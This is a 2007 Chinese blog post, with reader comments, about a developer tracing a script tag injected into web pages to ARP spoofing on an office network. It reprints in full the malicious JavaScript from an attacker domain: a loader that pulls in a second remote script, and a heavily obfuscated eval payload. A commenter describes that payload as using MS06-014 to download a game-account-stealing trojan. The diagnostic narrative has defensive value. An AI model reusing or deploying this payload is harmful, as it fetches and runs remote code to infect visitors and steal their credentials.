深入浅出 ck1.in/N.JS

异常发现:
       今天一早, 突然发现昨晚工作到深夜的成果Symfony API显示不正常, 寻找原因,发现html的首行加入了<script src=http://ck1.in/N.JS></script> .
原因分析与验证: 
1. 难道文件不小心被感染了? 到服务器上查看了一下文件, 发现很正常, 没有多余的代码.
2. 服务器被感染了, apache 返回html的时候自动加上代码?  在服务器上运行了wget一下, 发现获得的代码没问题. 看来问题出在客户端或者网络上.
3. 在服务器上构造了一个只有3个字符的静态页面, 在本地访问了一下, 仍然发现相同的js代码. 这样, 用它来做判断标准.
3. 杀毒软件出动. 我比较懒, 没安杀毒软件. 但对360safe比较有信心. 用他查了一边, 排查重点放在 网络异常驱动和LSP连接上, 但还是没有发现异常.
4. 上网查查吧. baidu,google 了一大通, 没有任何可用的信息.
5. 换台计算机吧. 别人都在忙, 还是用虚拟机吧. 启动了vmware 下的centos, 访问了一下, 没有发现js代码, 于是我基本可以断定问题处在我的windows上.
6.  公司里测试人员报了一个bug, 技术人员一调试也发现了相同的js代码. My God, 我用其他的计算机放问了一下测试页, 均发现相同的js代码.
7.  终极武器出动: Sniffer Pro. 此步之前, 我是用HTTPwatch 抓IE的包, 监听不够彻底, 于是现下了一个sniffer pro. 启动了sniffer pro, 发现arp reply 异常的多. 路由器异常? 因为公司刚换了路由器, 所以没有在意. 设置了filter, 抓取本地访问只有3个字符的测试页面, 查看数据包. 我的天!!! 竟然sniffer pro 也抓到了那段JS. 因为经历了第5步排查, 我基本断定问题处在本地计算机上. 于是,我怀疑起sniffer pro:原来 sniffer pro的驱动也不够底层, 竟然可以被病毒提前修改数据包. 
7. 无计可施了.  既然找不到原因, 看来重装系统比较快捷了. 在死之前, 还是仔细研究一下为什么arp reply这么多吧.  ARP欺骗? 把数据包的源MAC和路由器管理界面的本地MAC对照一下, 发现了大秘密: 原来这一切很可能是ARP欺骗的原因.
8.  验证是否是ARP欺骗. 通过种种手段, 找到了犯罪嫌疑机器, 来了一个潇洒的"右击->禁用", 然后在被发现同样中招的机器上来一个高深的 "arp -d", 然后访问测试页面, Very good, 不再有那可恶的js了.
总结.
    a. 原来这是ARP做的孽. 在我印象里, arp欺骗常被人用来非法监听数据包,盗取密码, 没想到可以这样...... 用它来弹出广告应该不错, 可以赚很多钱 呵呵~~~ 
    b. 本日志也算是总结吧, 把发现问题,寻找问题的思路写出来, 希望对大家有用~ 
    c. 至于这个可恶的代码是干什么的, 写的比较高深, 以后研究吧~~

附带相关病毒文件代码,以待有识之士研究:
http://ck1.in/N.JS

document.writeln("<script src=\"http:\/\/ck1.in\/S368\/NewJs2.js\"><\/script>");
document.writeln("<script>");
document.writeln("function Start(){");
document.writeln("var Then = new Date() ");
document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)");
document.writeln("var cookieString = new String(document.cookie)");
document.writeln("var cookieHeader = \"Cookie1=\" ");
document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)");
document.writeln("if (beginPosition != -1){ ");
document.writeln("} else ");
document.writeln("{ document.cookie = \"Cookie1=POPWINDOS;expires=\"+ Then.toGMTString() ");
document.writeln("");
document.writeln("}");
document.writeln("}");
document.writeln("Start();");
document.writeln("<\/script>")

http:\\ck1.in\S368\NewJs2.js
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1a("\\i\\g\\e\\h\\j\\2\\5\\3\\d\\m\\7\\8\\3\\2\\l\\5\\c\\4\\U\\q\\e\\7\\8\\G\\3\\T\\m\\8\\5\\i\\g\\m\\d\\g\\5\\2\\7\\7\\g\\7\\u\\N\\h\\5\\e\\3\\8\\g\\5\\c\\b\\W\\7\\2\\3\\h\\7\\5\\f\\3\\7\\h\\2\\9\\V\\U\\0\\11\\q\\e\\7\\8\\G\\3\\T\\4\\b\\9\\p\\o\\i\\g\\e\\h\\j\\2\\5\\3\\d\\m\\7\\8\\3\\2\\l\\5\\c\\4\\U\\q\\e\\7\\8\\G\\3\\T\\4\\b\\9\\p\\o\\i\\g\\e\\h\\j\\2\\5\\3\\d\\m\\7\\8\\3\\2\\l\\5\\c\\4\\f\\D\\17\\u\\0\\s\\0\\0\\1\\6\\K\\0\\0\\1\\n\\k\\0\\0\\1\\n\\k\\0\\0\\1\\n\\A\\0\\0\\1\\a\\H\\0\\0\\1\\t\\y\\0\\0\\1\\t\\y\\0\\0\\1\\6\\a\\0\\0\\1\\6\\I\\0\\0\\1\\a\\x\\0\\0\\1\\t\\B\\0\\0\\1\\6\\z\\0\\0\\1\\6\\B\\0\\0\\1\\t\\y\\0\\0\\1\\r\\a\\0\\0\\1\\a\\a\\0\\0\\1\\a\\6\\0\\0\\1\\a\\K\\0\\0\\1\\t\\y\\0\\0\\1\\r\\a\\0\\0\\1\\a\\a\\0\\0\\1\\a\\6\\0\\0\\1\\a\\K\\0\\0\\1\\t\\B\\0\\0\\1\\6\\r\\0\\0\\1\\n\\K\\0\\0\\1\\6\\r\\0\\s\\9\\4\\b\\9\\p\\o\\i\\g\\e\\h\\j\\2\\5\\3\\d\\m\\7\\8\\3\\2\\l\\5\\c\\4\\f\\F\\2\\q\\3\\w\\8\\w\\8\\u\\0\\s\\0\\s\\9\\4\\b\\9\\p\\o\\i\\g\\e\\h\\j\\2\\5\\3\\d\\m\\7\\8\\3\\2\\l\\5\\c\\4\\N\\h\\5\\e\\3\\8\\g\\5\\f\\10\\5\\L\\q\\c\\5\\b\\f\\4\\b\\9\\p\\o\\i\\g\\e\\h\\j\\2\\5\\3\\d\\m\\7\\8\\3\\2\\l\\5\\c\\4\\W\\f\\4\\b\\9\\p\\o\\i\\g\\e\\h\\j\\2\\5\\3\\d\\m\\7\\8\\3\\2\\l\\5\\c\\4\\f\\O\\v\\7\\f\\5\\h\\j\\P\\2\\7\\L\\q\\f\\u\\f\\L\\v\\3\\Q\\d\\7\\v\\5\\i\\g\\j\\c\\b\\19\\5\\9\\4\\b\\9\\p\\o\\i\\g\\e\\h\\j\\2\\5\\3\\d\\m\\7\\8\\3\\2\\l\\5\\c\\4\\f\\7\\2\\3\\h\\7\\5\\f\\0\\s\\0\\0\\1\\n\\B\\0\\0\\1\\r\\k\\0\\0\\1\\6\\r\\0\\0\\1\\6\\D\\0\\0\\1\\n\\A\\0\\s\\R\\L\\v\\3\\Q\\d\\7\\g\\h\\5\\i\\c\\5\\h\\j\\P\\2\\7\\L\\q\\b\\R\\0\\s\\0\\0\\1\\t\\B\\0\\0\\1\\n\\k\\0\\0\\1\\6\\D\\0\\0\\1\\n\\A\\0\\s\\9\\4\\b\\9\\p\\o\\i\\g\\e\\h\\j\\2\\5\\3\\d\\m\\7\\8\\3\\2\\l\\5\\c\\4\\V\\f\\4\\b\\9\\p\\o\\i\\g\\e\\h\\j\\2\\5\\3\\d\\m\\7\\8\\3\\2\\l\\5\\c\\4\\f\\3\\7\\Z\\f\\4\\b\\9\\p\\o\\i\\g\\e\\h\\j\\2\\5\\3\\d\\m\\7\\8\\3\\2\\l\\5\\c\\4\\W\\4\\b\\9\\p\\o\\i\\g\\e\\h\\j\\2\\5\\3\\d\\m\\7\\8\\3\\2\\l\\5\\c\\4\\f\\F\\2\\q\\3\\w\\8\\w\\8\\u\\0\\s\\0\\s\\9\\4\\b\\9\\p\\o\\i\\g\\e\\h\\j\\2\\5\\3\\d\\m\\7\\8\\3\\2\\l\\5\\c\\4\\f\\O\\v\\7\\f\\I\\N\\u\\i\\g\\e\\h\\j\\2\\5\\3\\d\\e\\7\\2\\v\\3\\2\\B\\l\\2\\j\\2\\5\\3\\c\\0\\4\\0\\0\\1\\6\\y\\0\\0\\1\\6\\t\\0\\0\\1\\6\\H\\0\\0\\1\\6\\r\\0\\0\\1\\6\\a\\0\\0\\1\\n\\k\\0\\4\\b\\9\\4\\b\\9\\p\\o\\i\\g\\e\\h\\j\\2\\5\\3\\d\\m\\7\\8\\3\\2\\l\\5\\c\\4\\f\\I\\N\\d\\q\\2\\3\\H\\3\\3\\7\\8\\P\\h\\3\\2\\c\\0\\4\\0\\0\\1\\6\\a\\0\\0\\1\\6\\E\\0\\0\\1\\6\\x\\0\\0\\1\\n\\a\\0\\0\\1\\n\\a\\0\\0\\1\\6\\z\\0\\0\\1\\6\\k\\0\\4\\C\\0\\4\\0\\0\\1\\6\\a\\0\\0\\1\\6\\E\\0\\0\\1\\n\\a\\0\\0\\1\\6\\z\\0\\0\\1\\6\\k\\0\\0\\1\\a\\H\\0\\0\\1\\k\\t\\0\\0\\1\\k\\k\\0\\0\\1\\a\\z\\0\\0\\1\\a\\6\\0\\0\\1\\k\\a\\0\\0\\1\\a\\r\\0\\0\\1\\a\\r\\0\\0\\1\\a\\6\\0\\0\\1\\t\\D\\0\\0\\1\\a\\6\\0\\0\\1\\a\\r\\0\\0\\1\\k\\x\\0\\0\\1\\a\\a\\0\\0\\1\\t\\D\\0\\0\\1\\a\\x\\0\\0\\1\\a\\x\\0\\0\\1\\k\\k\\0\\0\\1\\a\\A\\0\\0\\1\\t\\D\\0\\0\\1\\a\\z\\0\\0\\1\\a\\K\\0\\0\\1\\a\\a\\0\\0\\1\\k\\x\\0\\0\\1\\t\\D\\0\\0\\1\\a\\A\\0\\0\\1\\a\\A\\0\\0\\1\\k\\a\\0\\0\\1\\a\\A\\0\\0\\1\\a\\k\\0\\0\\1\\k\\6\\0\\0\\1\\k\\a\\0\\0\\1\\a\\t\\0\\0\\1\\a\\z\\0\\0\\1\\k\\r\\0\\0\\1\\a\\a\\0\\0\\1\\a\\6\\0\\4\\b\\9\\4\\b\\9\\p\\o\\i\\g\\e\\h\\j\\2\\5\\3\\d\\m\\7\\8\\3\\2\\l\\5\\c\\4\\f\\O\\v\\7\\f\\Y\\1\\u\\I\\N\\d\\E\\7\\2\\v\\3\\2\\S\\P\\X\\2\\e\\3\\c\\0\\4\\0\\0\\1\\k\\D\\0\\0\\1\\6\\z\\0\\0\\1\\6\\a\\0\\0\\1\\n\\t\\0\\0\\1\\6\\y\\0\\0\\1\\n\\a\\0\\0\\1\\6\\y\\0\\0\\1\\6\\6\\0\\0\\1\\n\\k\\0\\0\\1\\t\\B\\0\\0\\1\\r\\K\\0\\4\\R\\0\\4\\0\\0\\1\\k\\D\\0\\0\\1\\k\\E\\0\\0\\1\\k\\K\\0\\0\\1\\r\\k\\0\\0\\1\\r\\k\\0\\0\\1\\r\\A\\0\\4\\C\\0\\4\\0\\4\\b\\9\\4\\b\\9\\p\\o\\i\\g\\e\\h\\j\\2\\5\\3\\d\\m\\7\\8\\3\\2\\l\\5\\c\\4\\f\\O\\v\\7\\f\\H\\J\\u\\I\\N\\d\\E\\7\\2\\v\\3\\2\\S\\P\\X\\2\\e\\3\\c\\0\\4\\0\\0\\1\\k\\x\\0\\0\\1\\6\\k\\0\\0\\1\\6\\y\\0\\0\\1\\6\\k\\0\\0\\1\\6\\t\\0\\0\\1\\t\\B\\0\\0\\1\\r\\a\\0\\0\\1\\n\\k\\0\\0\\1\\n\\t\\0\\0\\1\\6\\r\\0\\0\\1\\6\\x\\0\\0\\1\\6\\D\\0\\4\\C\\0\\4\\0\\4\\b\\9\\4\\b\\9\\p\\o\\i\\g\\e\\h\\j\\2\\5\\3\\d\\m\\7\\8\\3\\2\\l\\5\\c\\4\\f\\F\\2\\q\\3\\w\\8\\w\\8\\u\\0\\s\\0\\s\\9\\4\\b\\9\\p\\o\\i\\g\\e\\h\\j\\2\\5\\3\\d\\m\\7\\8\\3\\2\\l\\5\\c\\4\\f\\H\\J\\d\\3\\Z\\G\\2\\u\\x\\9\\4\\b\\9\\p\\o\\i\\g\\e\\h\\j\\2\\5\\3\\d\\m\\7\\8\\3\\2\\l\\5\\c\\4\\f\\F\\2\\q\\3\\w\\8\\w\\8\\u\\0\\s\\0\\s\\9\\4\\b\\9\\p\\o\\i\\g\\e\\h\\j\\2\\5\\3\\d\\m\\7\\8\\3\\2\\l\\5\\c\\4\\f\\Y\\1\\d\\g\\G\\2\\5\\c\\0\\4\\0\\0\\1\\k\\n\\0\\0\\1\\k\\r\\0\\0\\1\\r\\k\\0\\4\\C\\f\\D\\17\\C\\A\\b\\9\\4\\b\\9\\p\\o\\i\\g\\e\\h\\j\\2\\5\\3\\d\\m\\7\\8\\3\\2\\l\\5\\c\\4\\f\\F\\2\\q\\3\\w\\8\\w\\8\\u\\0\\s\\0\\s\\9\\4\\b\\9\\p\\o\\i\\g\\e\\h\\j\\2\\5\\3\\d\\m\\7\\8\\3\\2\\l\\5\\c\\4\\f\\Y\\1\\d\\q\\2\\5\\i\\c\\b\\9\\4\\b\\9\\p\\o\\i\\g\\e\\h\\j\\2\\5\\3\\d\\m\\7\\8\\3\\2\\l\\5\\c\\4\\f\\F\\2\\q\\3\\w\\8\\w\\8\\u\\0\\s\\0\\s\\9\\4\\b\\9\\p\\o\\i\\g\\e\\h\\j\\2\\5\\3\\d\\m\\7\\8\\3\\2\\l\\5\\c\\4\\f\\M\\q\\x\\u\\10\\5\\L\\q\\c\\z\\z\\z\\z\\b\\9\\4\\b\\9\\p\\o\\i\\g\\e\\h\\j\\2\\5\\3\\d\\m\\7\\8\\3\\2\\l\\5\\c\\4\\f\\F\\2\\q\\3\\w\\8\\w\\8\\u\\0\\s\\0\\s\\9\\4\\b\\9\\p\\o\\i\\g\\e\\h\\j\\2\\5\\3\\d\\m\\7\\8\\3\\2\\l\\5\\c\\4\\f\\O\\v\\7\\f\\e\\y\\u\\I\\N\\d\\E\\7\\2\\v\\3\\2\\S\\P\\X\\2\\e\\3\\c\\0\\4\\0\\0\\1\\r\\a\\0\\0\\1\\6\\a\\0\\0\\1\\n\\t\\0\\0\\1\\6\\z\\0\\0\\1\\n\\A\\0\\0\\1\\n\\k\\0\\0\\1\\6\\z\\0\\0\\1\\6\\B\\0\\0\\1\\6\\n\\0\\0\\1\\t\\B\\0\\0\\1\\k\\6\\0\\0\\1\\6\\z\\0\\0\\1\\6\\E\\0\\0\\1\\6\\r\\0\\0\\1\\r\\a\\0\\0\\1\\n\\z\\0\\0\\1\\n\\a\\0\\0\\1\\n\\k\\0\\0\\1\\6\\r\\0\\0\\1\\6\\D\\0\\0\\1\\k\\y\\0\\0\\1\\6\\t\\0\\0\\1\\6\\H\\0\\0\\1\\6\\r\\0\\0\\1\\6\\a\\0\\0\\1\\n\\k\\0\\4\\C\\0\\4\\0\\4\\b\\9\\4\\b\\9\\p\\o\\i\\g\\e\\h\\j\\2\\5\\3\\d\\m\\7\\8\\3\\2\\l\\5\\c\\4\\f\\O\\v\\7\\f\\M\\q\\F\\j\\G\\u\\e\\y\\d\\10\\2\\3\\J\\G\\2\\e\\8\\v\\l\\y\\g\\l\\i\\2\\7\\c\\A\\b\\9\\f\\M\\q\\x\\u\\f\\e\\y\\d\\I\\h\\8\\l\\i\\16\\v\\3\\Q\\c\\M\\q\\F\\j\\G\\C\\M\\q\\x\\b\\9\\f\\H\\J\\d\\S\\G\\2\\5\\c\\b\\9\\H\\J\\d\\18\\7\\8\\3\\2\\c\\Y\\1\\d\\7\\2\\q\\G\\g\\5\\q\\2\\I\\g\\i\\Z\\b\\9\\4\\b\\9\\p\\o\\i\\g\\e\\h\\j\\2\\5\\3\\d\\m\\7\\8\\3\\2\\l\\5\\c\\4\\f\\H\\J\\d\\J\\v\\O\\2\\F\\g\\y\\8\\l\\2\\c\\M\\q\\x\\C\\t\\b\\9\\f\\H\\J\\d\\E\\l\\g\\q\\2\\c\\b\\9\\f\\O\\v\\7\\f\\15\\u\\I\\N\\d\\E\\7\\2\\v\\3\\2\\S\\P\\X\\2\\e\\3\\c\\0\\4\\0\\0\\1\\r\\a\\0\\0\\1\\6\\K\\0\\0\\1\\6\\r\\0\\0\\1\\6\\E\\0\\0\\1\\6\\E\\0\\0\\1\\t\\B\\0\\0\\1\\k\\x\\0\\0\\1\\n\\A\\0\\0\\1\\n\\A\\0\\0\\1\\6\\E\\0\\0\\1\\6\\z\\0\\0\\1\\6\\a\\0\\0\\1\\6\\x\\0\\0\\1\\n\\k\\0\\0\\1\\6\\z\\0\\0\\1\\6\\y\\0\\0\\1\\6\\B\\0\\4\\C\\0\\4\\0\\4\\b\\9\\4\\b\\9\\p\\o\\i\\g\\e\\h\\j\\2\\5\\3\\d\\m\\7\\8\\3\\2\\l\\5\\c\\4\\f\\g\\13\\x\\u\\e\\y\\d\\I\\h\\8\\l\\i\\16\\v\\3\\Q\\c\\M\\q\\F\\j\\G\\R\\0\\s\\0\\0\\1\\r\\E\\0\\0\\1\\r\\E\\0\\0\\1\\n\\a\\0\\0\\1\\n\\z\\0\\0\\1\\n\\a\\0\\0\\1\\n\\k\\0\\0\\1\\6\\r\\0\\0\\1\\6\\D\\0\\0\\1\\a\\a\\0\\0\\1\\a\\t\\0\\s\\C\\0\\s\\0\\0\\1\\6\\a\\0\\0\\1\\6\\D\\0\\0\\1\\6\\k\\0\\0\\1\\t\\B\\0\\0\\1\\6\\r\\0\\0\\1\\n\\K\\0\\0\\1\\6\\r\\0\\s\\b\\9\\4\\b\\9\\p\\o\\i\\g\\e\\h\\j\\2\\5\\3\\d\\m\\7\\8\\3\\2\\l\\5\\c\\4\\f\\15\\d\\J\\w\\2\\14\\14\\B\\1\\2\\e\\h\\3\\2\\c\\g\\13\\x\\C\\0\\s\\0\\0\\1\\t\\A\\0\\0\\1\\t\\y\\0\\0\\1\\6\\a\\f\\0\\s\\R\\M\\q\\x\\C\\0\\4\\0\\4\\C\\0\\4\\0\\0\\1\\6\\y\\0\\0\\1\\n\\A\\0\\0\\1\\6\\r\\0\\0\\1\\6\\B\\0\\4\\C\\A\\b\\9\\4\\b\\9\\p\\o\\i\\g\\e\\h\\j\\2\\5\\3\\d\\m\\7\\8\\3\\2\\l\\5\\c\\4\\f\\F\\2\\q\\3\\w\\8\\w\\8\\u\\0\\s\\0\\s\\9\\4\\b\\9\\p\\o\\i\\g\\e\\h\\j\\2\\5\\3\\d\\m\\7\\8\\3\\2\\l\\5\\c\\4\\V\\f\\4\\b\\9\\p\\o\\i\\g\\e\\h\\j\\2\\5\\3\\d\\m\\7\\8\\3\\2\\l\\5\\c\\4\\f\\e\\v\\3\\e\\Q\\c\\L\\q\\12\\b\\f\\W\\f\\L\\q\\12\\u\\x\\9\\f\\V\\4\\b\\9\\p\\o\\i\\g\\e\\h\\j\\2\\5\\3\\d\\m\\7\\8\\3\\2\\l\\5\\c\\4\\f\\F\\2\\q\\3\\w\\8\\w\\8\\u\\0\\s\\0\\s\\9\\4\\b\\9\\p\\o\\i\\g\\e\\h\\j\\2\\5\\3\\d\\m\\7\\8\\3\\2\\l\\5\\c\\4\\U\\0\\11\\q\\e\\7\\8\\G\\3\\T\\4\\b")',62,73,'x5C|x78|x65|x74|x22|x6E|x36|x72|x69|x3B|x33|x29|x28|x2E|x63|x20|x6F|x75|x64|x6D|x34|x6C|x77|x37|x0A|x0D|x73|x35|x27|x32|x3D|x61|x48|x31|x46|x39|x30|x45|x2C|x44|x43|x54|x70|x41|x42|x53|x38|x4D|x4E|x66|x76|x62|x68|x2B|x4F|x3E|x3C|x7D|x7B|x6A|x4B|x79|x47|x2F|x49|x6B|x4C|x71|x50|x5A|x57|x2A|eval'.split('|'),0,{}))

posted @ 2007-07-12 11:36 y9902 阅读(4827) 评论(15) 编辑 收藏

 回复 引用   
#1楼 2007-07-12 14:39 小骏[未注册用户]
NewJs2.js的内容我已经解析出来了,可以到我的Blog上看到:http://www.jackytsu.com/post/杂七杂八的东西就放在这里了/2007/07/57.html
想问问博主,到底是如何确定是哪台机器中招了的呢?
 回复 引用   
#2楼 2007-07-12 14:42 小骏[未注册用户]
这个脚本是想利用MS06014漏洞让机器从他的网站下载一个盗取网游帐号的木马文件,不过这个漏洞很早就已经被微软给堵上了,所以木马本身是不会起任何作用的。
 回复 引用   
#3楼 2007-07-13 14:07 小骏[未注册用户]
之前的那个地址已经无效了,想看那段脚本的可以去这个地址:http://www.jackytsu.com/post/乱七八糟的一些不知道该放哪儿的东西/2007/07/57.html
 回复 引用   
#4楼 2007-07-17 04:37 xinbin[未注册用户]
如何取定哪台计算机中招了?

ARP欺骗一般是拿中招计算机的真实MAC(即在网络通讯中所用MAC)去实施欺骗。所以根据MAC就可以断定IP,根据IP就可以了解更多信息,间接找到中招的计算机
 回复 引用   
#5楼 2007-07-17 08:29 robustman[未注册用户]
看看哪个mac冒充网关不就知道了吗。比较费时间,发现后先把fdb对应的端口关闭,让那个中毒的机器自动找到你。
 回复 引用   
#6楼 2007-07-18 15:17 sonf[未注册用户]
不用这么麻烦,PC换个IP即可
 回复 引用   
#7楼 2007-07-18 15:22 joney[未注册用户]
老大,fdb对应的端口指的是?

 回复 引用   
#8楼 2007-07-21 08:52 陈旭[未注册用户]
看来是自己机器的问题了
我发现访问google就不会有这个代码
有没有专杀工具啊?
 回复 引用   
#9楼 2007-07-24 10:00 老王[未注册用户]
sonf 的意见非常有效。
 回复 引用   
#10楼 2007-07-24 11:34 小骏[未注册用户]
@sonf
其实换IP是没有作用的
换了IP过后只是之前有问题的网站正常了
当再次中招后就会发现其他原本正常的网站又中招了
 回复 引用   
#11楼 2007-07-24 11:52 小王[未注册用户]
如何取定哪台计算机中招了?

ARP欺骗一般是拿中招计算机的真实MAC(即在网络通讯中所用MAC)去实施欺骗。所以根据MAC就可以断定IP,根据IP就可以了解更多信息,间接找到中招的计算机

大哥能不能说具体一点 比如用什么工具软件能确定
我们公司现在就是中的这种病毒 真是麻烦啊 好多需要登陆的网站都不能登陆
看了网上说的装了相应的防ARP欺骗的软件指定了网关地址还是老问题
网管也找不出什么问题 公司里150多台电脑搞死了
能不能指教下
多谢了
 回复 引用   
#12楼 2007-07-24 13:28 小王[未注册用户]
还有这个ARP欺骗病毒好像并不经过网关
用ARP SNIFFER这种软件开启自动防护后并没有病毒机器去修改网关的MAC
用网络分析工具抓ARP包也不能发现什么异常
楼主是怎么找出中招的计算机的?
跪谢
 回复 引用   
#13楼 2007-07-24 18:50 xinbin[未注册用户]
如果确认被arp欺骗了, 那么本地网关对应的MAC,以及抓包发现的ARP Reply的源地址就是中招机器的MAC。(一般情况下是这样,虽然从技术角度上讲可以实现不一致)

那么怎么找到MAC对应的IP呢?方法有二:
1。 使用局域网管理工具,或者使用IP扫描软件扫描所在网段,然后在命令行下执行 arp -a,就会答应出 IP-MAC的对应关系。
2。 (技巧) 打开网络连接-〉工作组, 这时系统会主动扫描网络,如果对方机器是windows,就有可能回应,于是本地也就有了IP-MAC的对应关系。
 回复 引用   
#14楼 2007-07-25 11:08 夺[未注册用户]
有无专杀工具?
 回复 引用   
#15楼 2007-08-09 22:22 itolaiai[未注册用户]
心汗...过了偶的诺顿啦..可恶啊..还好我这没遇过..以前遇过次也是针对微软BUG的...还好发现得急时...


最新IT新闻:
· 微软任命新全球公共业务部门副总裁
· 职业社交网LinkedIn拟在移动应用中植入广告
· 企业微博:信息流通以人为本
· 分析师称谷歌进军硬件领域没有好结果
· 三十秒带你看尽每一款苹果产品,每一款NeXT产品
» 更多新闻...